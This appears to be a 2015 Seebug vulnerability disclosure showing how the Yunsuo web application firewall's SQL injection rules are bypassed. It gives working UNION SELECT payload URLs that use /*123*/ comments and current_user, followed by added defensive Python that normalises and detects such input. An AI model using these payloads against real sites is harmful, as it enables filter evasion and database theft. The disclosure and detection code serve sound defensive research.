Yunsuo (云锁) latest version 1.3.191 protection rule bypass

2015-03-22T00:00:00
ID SSV:95520
Type seebug
Reporter Root
Modified 2015-03-22T00:00:00

Description

Brief description:

After several weeks of trying I finally got around it; it really was not easy. Asking for the front page. Persistence is an attitude~

Detailed description:

The test was done against the latest Windows build, win_1.3.191. There are two problems: 1. The default configuration provides no protection for POST bodies or cookies; features that provide protection ought to be ticked by default.

<img src="https://images.seebug.org/upload/201503/221526272b1c2aece20b6b431de64be51d694796.jpg" alt="y.jpg">

2. The protection rules can be bypassed with the /*123*/ comment form.

Proof of vulnerability:

Again, set up an injection test environment: 1. First try /**/ and find that it is intercepted by Yunsuo:

http://localhost/74/wap/wap-company-show.php?id=8E0union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#

<img src="https://images.seebug.org/upload/201503/22152947bc23b6813011590dbe5a7ff5b01497b0.jpg" alt="2.jpg">

2. Using /**/ succeeds and returns many fields:

http://localhost/74/wap/wap-company-show.php?id=8E0union/*123*/select/*123*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#

<img src="https://images.seebug.org/upload/201503/221528336bd498d8ce296273e5ea6deeba52d3e5.jpg" alt="1.jpg">

3. Then another problem came up: Yunsuo's protection of database queries turned out to be very strict.

http://localhost/74/wap/wap-company-show.php?id=8E0union/*123*/select/*123*/1,2,3,user%28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#

<img src="https://images.seebug.org/upload/201503/221531374299d7a0bfbd3d57da283edd8ba82eee.jpg" alt="3.jpg">

4. After a few weeks of study, I found that the current_user form gets past it again!

http://localhost/74/wap/wap-company-show.php?id=8E0union/*123*/select/*123*/1,2,3,current_user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#

<img src="https://images.seebug.org/upload/201503/2215330881a0dae42e1d7c601c74e058d483e8b2.jpg" alt="4.jpg">
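As an added defender-side example (not part of the original report and not Yunsuo's code), the Python below shows the normalisation step that the bypassed rules were missing: inline comments are collapsed to whitespace before any pattern is matched, the UNION/SELECT pattern does not demand a leading word boundary (the payloads above glue `union` onto `8E0`), and the same inspection runs over query, body and cookie parameters rather than the query string alone. The rule patterns and the `inspect_request` interface are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Inline comments of any length: /**/, /*123*/, /* anything at all */.
_COMMENT_RE = re.compile(r"/\*.*?\*/", re.DOTALL)

# Hypothetical rule set, applied only to the normalised value.
# No leading \b on "union": "8E0union" has no word boundary before it.
_UNION_SELECT_RE = re.compile(r"union\s+(?:all\s+)?select\b", re.IGNORECASE)
# user() and current_user (with or without parentheses) are equivalent for
# this purpose, so the rule must cover both spellings.
_IDENTITY_RE = re.compile(
    r"\b(?:user\s*\(\s*\)|current_user(?:\s*\(\s*\))?|session_user\s*\(\s*\))",
    re.IGNORECASE,
)


def normalize(value: str) -> str:
    """URL-decode, replace each /*...*/ comment with one space, collapse whitespace."""
    decoded = unquote_plus(value)
    no_comments = _COMMENT_RE.sub(" ", decoded)
    return " ".join(no_comments.split()).lower()


def inspect_value(value: str) -> list:
    """Return the names of the rules that fire on a single parameter value."""
    norm = normalize(value)
    hits = []
    if _UNION_SELECT_RE.search(norm):
        hits.append("union-select")
    if _IDENTITY_RE.search(norm):
        hits.append("identity-function")
    return hits


def inspect_request(query: dict, body: dict, cookies: dict) -> dict:
    """Run the same checks over every request location, not only the query string."""
    findings = {}
    for location, params in (("query", query), ("body", body), ("cookie", cookies)):
        for name, value in params.items():
            hits = inspect_value(value)
            if hits:
                findings[f"{location}:{name}"] = hits
    return findings


if __name__ == "__main__":
    # Constructed sample request reusing the report's id parameter shapes.
    print(inspect_request({"id": "8E0union/*123*/select/*123*/1,2,3,current_user,5"},
                          {}, {"sess": "1/*x*/union/**/select/**/1"}))
```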

Persistence is an attitude~